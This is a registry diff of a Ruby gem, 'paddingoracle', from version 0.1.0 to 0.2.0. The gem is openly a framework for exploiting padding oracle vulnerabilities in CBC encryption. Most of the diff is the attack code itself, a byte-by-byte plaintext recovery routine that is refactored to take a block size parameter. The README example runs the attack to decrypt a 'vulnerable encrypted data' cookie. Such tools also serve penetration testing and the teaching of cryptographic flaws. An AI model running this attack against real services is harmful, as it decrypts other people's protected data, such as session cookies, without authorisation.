paddingoracle 0.1.0 → 0.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/README.md +5 -1
- data/lib/paddingoracle.rb +15 -15
- data/lib/paddingoracle/version.rb +1 -1
- metadata +2 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA1:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: ed7da81de6de88c046ea1542757eb9936910604b
|
|
4
|
+
data.tar.gz: 76bf4af6ad1174ffbb3b89ac44c0d32a2eb67e0a
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: ef17fc788bc35503cac8d392cd54ad8549013d8431f1886a97de0132941a1b8c5a4fca4820c64d6a4a2bb0b16e1fa0773a5809321fc0a4d80b35afc95ce59c65
|
|
7
|
+
data.tar.gz: ab57fb81ca8ad1aecea3536d813659fbe1eeef4fa684044bb651c356dc00e905dfd56b3f29fa09f418349c1320828d6fc2343fe6d85d9c8c89ef6e8a48387a85
|
data/README.md
CHANGED
|
@@ -4,6 +4,9 @@ This is a Rubyframework for exploiting padding oracle vulnerabilities based on t
|
|
|
4
4
|
|
|
5
5
|
https://github.com/mwielgoszewski/python-paddingoracle
|
|
6
6
|
|
|
7
|
+
## Build status
|
|
8
|
+
[](https://travis-ci.org/technion/paddingoracle)
|
|
9
|
+
|
|
7
10
|
## Usage
|
|
8
11
|
|
|
9
12
|
|
|
@@ -27,9 +30,10 @@ end
|
|
|
27
30
|
|
|
28
31
|
You can then run the attack like this;
|
|
29
32
|
```
|
|
33
|
+
Blocksize = 8
|
|
30
34
|
COOKIE = 'vulnerable encrypted data'
|
|
31
35
|
bcookie = Base64.decode64(COOKIE)
|
|
32
|
-
plain = Paddingoracle::recover_all_blocks(bcookie)
|
|
36
|
+
plain = Paddingoracle::recover_all_blocks(bcookie, Blocksize)
|
|
33
37
|
puts plain
|
|
34
38
|
```
|
|
35
39
|
|
data/lib/paddingoracle.rb
CHANGED
|
@@ -5,13 +5,12 @@ require 'uri'
|
|
|
5
5
|
|
|
6
6
|
module Paddingoracle
|
|
7
7
|
extend self
|
|
8
|
-
Blocksize = 8
|
|
9
8
|
|
|
10
9
|
def remove_pad(str)
|
|
11
10
|
# Remove PKCS #7 padding
|
|
12
11
|
raise "Incompatible remove_pad input" unless str.kind_of? String
|
|
13
12
|
last = str[-1,1]
|
|
14
|
-
raise "Invalid padding" unless last.ord > 0 && last.ord <=
|
|
13
|
+
raise "Invalid padding" unless last.ord > 0 && last.ord <= str.size
|
|
15
14
|
|
|
16
15
|
padstr = last.chr * last.ord
|
|
17
16
|
|
|
@@ -23,15 +22,15 @@ module Paddingoracle
|
|
|
23
22
|
return str[0..(str.length-last.ord)-1]
|
|
24
23
|
end
|
|
25
24
|
|
|
26
|
-
def recover_block(enc, prevblock)
|
|
25
|
+
def recover_block(enc, prevblock, blocksize)
|
|
27
26
|
#For a single CBC-encrypted block, utilise padding Oracle to
|
|
28
27
|
#recover plaintext
|
|
29
|
-
if enc.length !=
|
|
28
|
+
if enc.length != blocksize || prevblock.length != blocksize
|
|
30
29
|
raise "Incorrect block size to recover"
|
|
31
30
|
end
|
|
32
31
|
ret = ""
|
|
33
32
|
gen = ""
|
|
34
|
-
(0..
|
|
33
|
+
(0..blocksize-1).to_a.reverse.each do |k| #For each byte in block
|
|
35
34
|
(0..256).each { |n|
|
|
36
35
|
if n == 256
|
|
37
36
|
#Should break before this point. n is only valid in 0-255
|
|
@@ -40,7 +39,7 @@ module Paddingoracle
|
|
|
40
39
|
end
|
|
41
40
|
testblock = 'A' * k + n.chr + gen + enc
|
|
42
41
|
puts testblock.unpack('H*').join
|
|
43
|
-
if testblock.length != 2*
|
|
42
|
+
if testblock.length != 2*blocksize
|
|
44
43
|
raise "Test block had incorrect blocksize"
|
|
45
44
|
end
|
|
46
45
|
#puts "Lengths are #{testblock.length}"
|
|
@@ -52,29 +51,30 @@ module Paddingoracle
|
|
|
52
51
|
#The decrypt_oracle will raise this if the padding is invalid
|
|
53
52
|
next
|
|
54
53
|
end
|
|
55
|
-
b = (n.ord ^ (
|
|
54
|
+
b = (n.ord ^ (blocksize-k).ord ^ prevblock[k].ord).ord
|
|
56
55
|
#Debugging
|
|
57
56
|
ret = b.chr + ret
|
|
58
57
|
break #No need to continue once identified
|
|
59
58
|
}
|
|
60
59
|
gen = ret.bytes.map.with_index{ |x, i|
|
|
61
|
-
((
|
|
60
|
+
((blocksize-k+1).ord ^ x.ord ^ prevblock[k+i].ord).chr
|
|
61
|
+
}.join
|
|
62
62
|
|
|
63
63
|
end
|
|
64
64
|
return ret
|
|
65
65
|
end
|
|
66
66
|
|
|
67
|
-
def recover_all_blocks(enc)
|
|
67
|
+
def recover_all_blocks(enc, blocksize)
|
|
68
68
|
#Cycle through each Blocksize block and gather results
|
|
69
69
|
#Strip PKCS#7 padding before returning
|
|
70
|
-
raise "Invalid block" unless enc.length %
|
|
70
|
+
raise "Invalid block" unless enc.length % blocksize == 0
|
|
71
71
|
ret = ""
|
|
72
|
-
prevblock = enc[0..
|
|
73
|
-
enc = enc[
|
|
72
|
+
prevblock = enc[0..blocksize-1]
|
|
73
|
+
enc = enc[blocksize..enc.length-1]
|
|
74
74
|
puts "we have #{enc.length} in length"
|
|
75
|
-
(0..enc.length-
|
|
76
|
-
block = enc[n..n+
|
|
77
|
-
ret += recover_block(block, prevblock)
|
|
75
|
+
(0..enc.length-blocksize).step(blocksize) do |n|
|
|
76
|
+
block = enc[n..n+blocksize-1]
|
|
77
|
+
ret += recover_block(block, prevblock, blocksize)
|
|
78
78
|
prevblock = block
|
|
79
79
|
end
|
|
80
80
|
ret = remove_pad(ret)
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: paddingoracle
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.2.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- Technion
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2017-04-
|
|
11
|
+
date: 2017-04-07 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: bundler
|